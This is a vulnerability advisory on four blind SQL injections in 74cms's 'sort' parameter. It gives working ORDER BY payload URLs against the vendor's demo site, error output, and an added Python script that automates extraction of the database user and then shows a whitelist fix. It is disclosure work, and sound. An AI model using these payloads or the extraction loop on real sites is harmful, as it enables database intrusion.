骑士CMS (74cms): four SQL injections in a new feature

2014-11-05T00:00:00
ID SSV:94131
Type seebug
Reporter Root
Modified 2014-11-05T00:00:00

Description

Summary:

Four blind SQL injections in a new feature of 骑士CMS, tested against the vendor's official demo site.

Details:

Four blind SQL injections in the official site's training-information search and headhunter job search (same `sort` parameter in each).

0x01: Location: Home > Education & Training > Course list (course search)

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc&key=

The sort parameter is injectable. Its value is split on `>`: the field name is mapped (hot becomes click), but the direction string after it is concatenated into the SQL verbatim:

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc%27&key=

Inserting a ' returns an error. Note the `\'` in the query: the quote is escaped, but the injection point sits in ORDER BY, outside any quoted literal, so escaping does nothing:

Error:Query error:SELECT * FROM qs_course WHERE audit=1 AND display=1 AND add_mode=1 ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

Blind injection, TRUE case. char(114,111,...,116) spells `root@localhost` (14 characters) without using quotes, which would be escaped; substr(user(),1,14) matches it, so strcmp() returns 0 and IF() sorts by click:

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20limit%201%23&key=

<img src="https://images.seebug.org/upload/201411/03140342dded30ec056ed69a637cded321343ae8.png" alt="11.png" width="600" onerror="javascript:errimg(this);">

FALSE case: with substr(user(),1,13) the 13-character prefix no longer equals the 14-character string, strcmp() is non-zero, and IF() sorts by refreshtime, so the first row changes:

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20limit%201%23&key=

<img src="https://images.seebug.org/upload/201411/03140428258e48a6dc063c3b4d93e6c1ac3f9545.png" alt="12.png" width="600" onerror="javascript:errimg(this);">

0x02: Location: Home > Education & Training > Agency list

http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Edesc

The sort parameter is injectable:

http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Edesc%27

Inserting a ' returns a SQL error:

Error:Query error:SELECT * FROM qs_train_profile ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

Blind injection, TRUE case:

http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23

<img src="https://images.seebug.org/upload/201411/03140751f2c40645b5709a0a98bc8a567a6c10b2.png" alt="21.png" width="600" onerror="javascript:errimg(this);">

FALSE case:

<img src="https://images.seebug.org/upload/201411/03140811a089d15d088e07d8acb2d62a722741e0.png" alt="22.png" width="600" onerror="javascript:errimg(this);">

0x03: Location: Home > Education & Training > Lecturer list

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Edesc&inforow=

The sort parameter is injectable:

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Edesc%27&inforow=

Returns a SQL error:

Error:Query error:SELECT * FROM qs_train_teachers WHERE audit=1 ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

Blind injection, TRUE case:

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&inforow=

<img src="https://images.seebug.org/upload/201411/0314123278a8a0b82c3dd84914b8a8ead773a626.png" alt="31.png" width="600" onerror="javascript:errimg(this);">

FALSE:

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&inforow=

<img src="https://images.seebug.org/upload/201411/031413246b3ccea64137096a4b5913c1559ab4e4.png" alt="32.png" width="600" onerror="javascript:errimg(this);">

0x04: Location: Home > Senior recruitment (headhunter) jobs > Search results, search mode: full search

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Edesc&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

sort is injectable; injecting a ':

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Edesc%27&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

Returns a SQL error:

Error:Query error:SELECT * FROM qs_hunter_jobs ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

Blind injection, TRUE:

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

<img src="https://images.seebug.org/upload/201411/0314160673a379a35d490946c9fdc1eef7c8a256.png" alt="41.png" width="600" onerror="javascript:errimg(this);">

FALSE:

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Easc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

<img src="https://images.seebug.org/upload/201411/031416489979806f120d24b373d19b11b8e4c129.png" alt="42.png" width="600" onerror="javascript:errimg(this);">
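All four cases are the same defect: the direction half of `sort` is escaped and then concatenated into ORDER BY, where escaping is irrelevant. The following script is an added example, not code from the report or from 74cms. It rebuilds the vulnerable query the way the error text shows it being built, runs the report's IF/STRCMP/SUBSTR probe as a boolean oracle against an in-memory SQLite table, automates extraction of user() one character at a time, and then shows the whitelist that closes the hole. Everything beyond the report is an assumption: the qs_course columns, the sample rows, the value of user(), and the MySQL emulation (user() and strcmp() registered as SQLite functions, IF() written as CASE, `#` written as `--`, and `-refreshtime` in place of the report's `click` as the second branch so the two outcomes differ on a constructed table).

```python
"""Added example (not 74cms code): simulates the ORDER BY injection in the
report's `sort` parameter against SQLite, then shows the whitelist fix.
DB user, table layout and rows are constructed sample data."""
import sqlite3
import string

DB_USER = "root@localhost"          # constructed stand-in for MySQL's user()
SORT_FIELDS = {"hot": "click"}      # "hot" -> "click" is what the report's error text shows
SORT_DIRECTIONS = ("asc", "desc")

BASE_SQL = ("SELECT * FROM qs_course WHERE audit=1 AND display=1 AND add_mode=1 "
            "ORDER BY {order} LIMIT 0 , 10")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("user", 0, lambda: DB_USER)            # emulates MySQL user()
    conn.create_function("strcmp", 2, lambda a, b: (a > b) - (a < b))  # emulates STRCMP()
    conn.execute("CREATE TABLE qs_course (id INTEGER, name TEXT, click INTEGER, "
                 "refreshtime INTEGER, audit INTEGER, display INTEGER, add_mode INTEGER)")
    # Constructed rows. They tie on click on purpose: the injected expression
    # is only a secondary sort key, so it can change the first row only on a tie.
    conn.executemany("INSERT INTO qs_course VALUES (?,?,?,?,?,?,?)", [
        (1, "course-a", 0, 300, 1, 1, 1),
        (2, "course-b", 0, 100, 1, 1, 1),
        (3, "course-c", 0, 200, 1, 1, 1),
    ])
    return conn


def addslashes(s):
    """PHP-style escaping; this is what turned the probe's quote into \\' in the report."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def vulnerable_query(sort):
    """Field name is mapped, but the direction after '>' is escaped and
    concatenated raw. Escaping is useless here: ORDER BY is not a quoted context."""
    field, _, direction = sort.partition(">")
    column = SORT_FIELDS.get(field, "click")
    return BASE_SQL.format(order=f"{column} {addslashes(direction)}")


def safe_query(sort):
    """Hardened version: both halves must come from fixed whitelists."""
    field, _, direction = sort.partition(">")
    if field not in SORT_FIELDS or direction not in SORT_DIRECTIONS:
        raise ValueError(f"rejected sort value: {sort!r}")
    return BASE_SQL.format(order=f"{SORT_FIELDS[field]} {direction}")


def quote_probe_error(conn):
    """The report's first probe, sort=hot>desc'; returns the DB error text or None."""
    try:
        conn.execute(vulnerable_query("hot>desc'"))
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def blind_oracle(conn, prefix):
    """True when user() starts with `prefix`. Mirrors the report's payload: the
    string is sent as char(...) because a quoted literal would be escaped."""
    def first_row(p):
        codes = ",".join(str(ord(c)) for c in p)
        cond = f"strcmp(substr(user(),1,{len(p)}),char({codes}))"
        payload = f"hot>desc,CASE WHEN {cond} THEN refreshtime ELSE -refreshtime END limit 1 --"
        return conn.execute(vulnerable_query(payload)).fetchone()
    # A 64-character prefix can never match, so that response is the FALSE baseline.
    return first_row(prefix) != first_row("#" * 64)


def extract_user(conn, max_len=64):
    """Rebuild user() one character at a time from the boolean oracle."""
    alphabet = string.ascii_lowercase + string.digits + "@._-"
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            if blind_oracle(conn, found + ch):
                found += ch
                break
        else:
            break           # no character extends the prefix: end of the string
    return found


def accepted_by_whitelist(sort):
    try:
        safe_query(sort)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    db = open_db()
    print("probe error:", quote_probe_error(db))
    print("extracted user():", extract_user(db))
    print("payload accepted by whitelist:", accepted_by_whitelist("hot>desc,1 limit 1 --"))
```

Two caveats carry over to the real target. The injected IF() is appended after `click desc` (or `click asc`), so it is only a tie-breaker and the oracle is readable only where listed rows share the same click value; and MySQL's STRCMP() compares under the column collation, which is usually case-insensitive, whereas the emulated strcmp() above is case-sensitive. The fix is the whitelist in safe_query: for ORDER BY there is no escaping function to reach for, only a fixed map of allowed column names and the two allowed directions.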

Proof of vulnerability:

<img src="https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">